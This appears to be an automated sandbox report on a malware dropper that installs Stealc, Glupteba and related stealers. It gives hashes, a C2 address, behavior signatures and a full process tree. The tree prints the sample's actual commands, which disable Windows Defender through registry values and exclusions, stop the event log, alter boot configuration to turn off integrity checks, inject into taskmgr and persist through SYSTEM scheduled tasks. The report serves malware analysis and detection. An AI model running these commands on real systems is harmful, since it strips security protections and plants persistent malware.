Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10-05-2024 13:29

General

  • Target

    setup.exe

  • Size

    728.0MB

  • MD5

    d42c009f5de776968186dc6611afc922

  • SHA1

    dd33414810424002b6c352ba52e32cc6de107340

  • SHA256

    95d4dc9ddb0a283dc001ef3e24112336c19e4411a5749e9612b3b87bd4a3c278

  • SHA512

    dfd643f0f62d979fc39b582670e62e51407b45461258cda0d170d4448646064efb7bc8452c92055f2284e704e07412709537958695a5a8c9e0cc12c7ecf7850d

  • SSDEEP

    98304:3Spz0Du6W9TrgWd/JdKX1Hxsyp7loTGEE2W/gMnzJ:3Spr9TVdxQXkY5o7U

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.151

Attributes
  • url_path

    /7043a0c6a68d9c65.php

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Windows security bypass 2 TTPs 47 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 39 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Modifies firewall policy service
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Users\Admin\Documents\SimpleAdobe\16M2bK7ld_RrUPZ3cDbUvbQJ.exe
      C:\Users\Admin\Documents\SimpleAdobe\16M2bK7ld_RrUPZ3cDbUvbQJ.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2532
      • C:\Users\Admin\AppData\Local\Temp\is-0DIF9.tmp\16M2bK7ld_RrUPZ3cDbUvbQJ.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-0DIF9.tmp\16M2bK7ld_RrUPZ3cDbUvbQJ.tmp" /SL5="$60144,4107979,54272,C:\Users\Admin\Documents\SimpleAdobe\16M2bK7ld_RrUPZ3cDbUvbQJ.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe
          "C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe" -i
          4⤵
          • Executes dropped EXE
          PID:2292
        • C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe
          "C:\Users\Admin\AppData\Local\Fast Mixer Free Edition\fastmixerfreeedition.exe" -s
          4⤵
          • Executes dropped EXE
          PID:2508
    • C:\Users\Admin\Documents\SimpleAdobe\va86k3QJbH_FIU3g4Egyljx0.exe
      C:\Users\Admin\Documents\SimpleAdobe\va86k3QJbH_FIU3g4Egyljx0.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2380
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3068
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1232
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1812
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "RULTVSKP"
        3⤵
        • Launches sc.exe
        PID:2484
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:2076
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:2316
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "RULTVSKP"
        3⤵
        • Launches sc.exe
        PID:1940
    • C:\Users\Admin\Documents\SimpleAdobe\hGbHU7DrQaGAkCCMGvA0Qtgx.exe
      C:\Users\Admin\Documents\SimpleAdobe\hGbHU7DrQaGAkCCMGvA0Qtgx.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2180
      • C:\Users\Admin\Documents\SimpleAdobe\hGbHU7DrQaGAkCCMGvA0Qtgx.exe
        "C:\Users\Admin\Documents\SimpleAdobe\hGbHU7DrQaGAkCCMGvA0Qtgx.exe"
        3⤵
        • Windows security bypass
        • Executes dropped EXE
        • Loads dropped DLL
        • Windows security modification
        • Adds Run key to start application
        • Checks for VirtualBox DLLs, possible anti-VM trick
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:628
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
            PID:2568
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
              • Modifies Windows Firewall
              • Modifies data under HKEY_USERS
              PID:2468
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe
            4⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Manipulates WinMon driver.
            • Manipulates WinMonFS driver.
            • Drops file in Windows directory
            • Modifies system certificate store
            • Suspicious use of AdjustPrivilegeToken
            PID:1584
            • C:\Windows\system32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • Creates scheduled task(s)
              PID:2368
            • C:\Windows\system32\schtasks.exe
              schtasks /delete /tn ScheduledUpdate /f
              5⤵
                PID:2748
              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Modifies system certificate store
                PID:1508
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2376
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:776
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1284
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1044
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2004
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2184
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:3068
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2440
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1932
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1740
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1968
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -timeout 0
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2024
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2388
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2200
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\Sysnative\bcdedit.exe /v
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:1856
              • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                5⤵
                • Executes dropped EXE
                PID:308
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • Creates scheduled task(s)
                PID:2756
              • C:\Windows\windefender.exe
                "C:\Windows\windefender.exe"
                5⤵
                • Executes dropped EXE
                PID:1756
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  6⤵
                    PID:2964
                    • C:\Windows\SysWOW64\sc.exe
                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      7⤵
                      • Launches sc.exe
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2680
          • C:\Users\Admin\Documents\SimpleAdobe\q_yi4loLbGVuP3gdnWSiieTm.exe
            C:\Users\Admin\Documents\SimpleAdobe\q_yi4loLbGVuP3gdnWSiieTm.exe
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2088
            • C:\Users\Admin\AppData\Local\Temp\7zS79B2.tmp\Install.exe
              .\Install.exe
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2256
              • C:\Users\Admin\AppData\Local\Temp\7zS8C39.tmp\Install.exe
                .\Install.exe /mGKCedidCE "525403" /S
                4⤵
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates system info in registry
                PID:2576
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                    PID:2600
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      6⤵
                        PID:1312
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          7⤵
                            PID:1792
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              8⤵
                                PID:1748
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            6⤵
                              PID:2476
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                7⤵
                                  PID:2848
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    8⤵
                                      PID:1232
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  6⤵
                                    PID:2900
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      7⤵
                                        PID:2392
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          8⤵
                                            PID:1732
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                        6⤵
                                          PID:2360
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            7⤵
                                              PID:2928
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                8⤵
                                                  PID:2748
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              6⤵
                                                PID:308
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  7⤵
                                                    PID:2340
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      8⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:764
                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                        9⤵
                                                          PID:1756
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                  5⤵
                                                    PID:3016
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      6⤵
                                                        PID:2148
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                          7⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops file in System32 directory
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:340
                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            8⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1720
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 13:33:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\XKywUjg.exe\" LY /YNXdidAxLq 525403 /S" /V1 /F
                                                      5⤵
                                                      • Drops file in Windows directory
                                                      • Creates scheduled task(s)
                                                      PID:2708
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                                                      5⤵
                                                        PID:904
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                                          6⤵
                                                            PID:1784
                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                              schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                                              7⤵
                                                                PID:840
                                                    • C:\Users\Admin\Documents\SimpleAdobe\FV7GUk4b45l7XYLV6pdAL3wB.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\FV7GUk4b45l7XYLV6pdAL3wB.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2796
                                                    • C:\Users\Admin\Documents\SimpleAdobe\eMW17giTOz0ZdEzlFlfctqJt.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\eMW17giTOz0ZdEzlFlfctqJt.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2112
                                                    • C:\Users\Admin\Documents\SimpleAdobe\1aO_4Ph8WjTL8YmsDvgspMmM.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\1aO_4Ph8WjTL8YmsDvgspMmM.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Writes to the Master Boot Record (MBR)
                                                      PID:808
                                                    • C:\Users\Admin\Documents\SimpleAdobe\5ClIAdk6B2zwwZVtVh02Atny.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\5ClIAdk6B2zwwZVtVh02Atny.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1484
                                                    • C:\Users\Admin\Documents\SimpleAdobe\gxBDucONf56oCzQOjnfB2OuI.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\gxBDucONf56oCzQOjnfB2OuI.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1796
                                                    • C:\Users\Admin\Documents\SimpleAdobe\uzZi9rEzAxV101Nw31wN1vyL.exe
                                                      C:\Users\Admin\Documents\SimpleAdobe\uzZi9rEzAxV101Nw31wN1vyL.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:1208
                                                      • C:\Users\Admin\Documents\SimpleAdobe\uzZi9rEzAxV101Nw31wN1vyL.exe
                                                        "C:\Users\Admin\Documents\SimpleAdobe\uzZi9rEzAxV101Nw31wN1vyL.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                                        PID:2936
                                                  • C:\Windows\system32\makecab.exe
                                                    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510133147.log C:\Windows\Logs\CBS\CbsPersist_20240510133147.cab
                                                    1⤵
                                                    • Drops file in Windows directory
                                                    PID:2352
                                                  • C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
                                                    C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2948
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2644
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2552
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2712
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      2⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2668
                                                    • C:\Windows\system32\conhost.exe
                                                      C:\Windows\system32\conhost.exe
                                                      2⤵
                                                        PID:2768
                                                      • C:\Windows\system32\svchost.exe
                                                        svchost.exe
                                                        2⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:384
                                                    • C:\Windows\system32\taskeng.exe
                                                      taskeng.exe {C42A2ADF-0FA3-4D1A-A63C-9BFA74A00C69} S-1-5-18:NT AUTHORITY\System:Service:
                                                      1⤵
                                                        PID:1204
                                                        • C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\XKywUjg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\XKywUjg.exe LY /YNXdidAxLq 525403 /S
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          PID:2212
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                            3⤵
                                                              PID:1608
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:2460
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:2296
                                                                      • \??\c:\windows\SysWOW64\reg.exe
